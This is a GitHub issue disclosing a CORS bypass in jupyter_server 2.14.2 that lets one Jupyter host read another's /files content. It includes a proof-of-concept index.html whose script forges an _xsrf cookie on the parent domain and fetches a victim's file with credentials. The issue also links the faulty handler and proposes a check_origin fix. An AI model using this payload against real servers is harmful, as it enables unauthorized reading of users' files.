You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
When using JupyterLab + jupyter_server an attacker can pass a redirect using _xsrf HTTP param and cookie to bypass CORS checks (c.ServerApp.allow_origin_pat). Using jupyter-server 2.14.2. Redirect provides access to /files path
Reproduce
Scenario:
Jupyter Server 1 (myjupyterserver1.mydomain.com) - Attacker
sudo su
cd /opt/conda/share/jupyter/lab/static
mv index.html index.html.bak
vim index.html
Edit index.html
<html>
<body>
<script>
var notebook_domain = "" //example: myjupyterserver1.mydomain.com
var file_path = "/test.txt" // a Local file in c.ServerApp.root_dir
var base_domain = document.domain.substr(document.domain.indexOf('.'));
document.cookie='_xsrf=1;Domain='+base_domain;
fetch("https://"+notebook_domain+"/files"+file_path+"?_xsrf=1", {mode: "cors", credentials: "include"}).then(response => response.text()).then(text => {console.log(text)});
</script>
</body>
</html>
Attacker gives victim myjupyterserver1.mydomain.com which redirects to himself and bypass CORS checks.
Expected behavior
CORS logic is executed.c.ServerApp.allow_origin_pat is verified.
I tried to reproduce with local Jupyter but unable to do so. (local Jupyter 127.0.0.1:8081 and 127.0.0.1:8082), as I think _xsrf=1 cookie is not passed. I reproduced using Jupyter Server behind a Proxy.
Description
When using JupyterLab +
jupyter_server
an attacker can pass a redirect using _xsrf HTTP param and cookie to bypass CORS checks (c.ServerApp.allow_origin_pat
). Usingjupyter-server 2.14.2
. Redirect provides access to/files
pathReproduce
Scenario:
Jupyter Server 1 (
myjupyterserver1.mydomain.com
) - AttackerEdit index.html
myjupyterserver2.mydomain.com
)Attacker gives victim
myjupyterserver1.mydomain.com
which redirects to himself and bypass CORS checks.Expected behavior
CORS logic is executed.
c.ServerApp.allow_origin_pat
is verified.I tried to reproduce with local Jupyter but unable to do so. (local Jupyter 127.0.0.1:8081 and 127.0.0.1:8082), as I think
_xsrf=1 cookie is not passed.
I reproduced using Jupyter Server behind a Proxy.Context
Bug here:
https://github.com/jupyter-server/jupyter_server/blob/main/jupyter_server/base/handlers.py#L537
https://github.com/tornadoweb/tornado/blob/master/tornado/web.py#L1619
Potential fix add
check_origin()
method. Fix worked in lab.super().check_xsrf_cookie()
is calling tornado.Troubleshoot Output
Request is not blocked even when
c.ServerApp.allow_origin_pat
is configured correctly.Command Line Output
I added extra debugs:
Browser Output
The text was updated successfully, but these errors were encountered: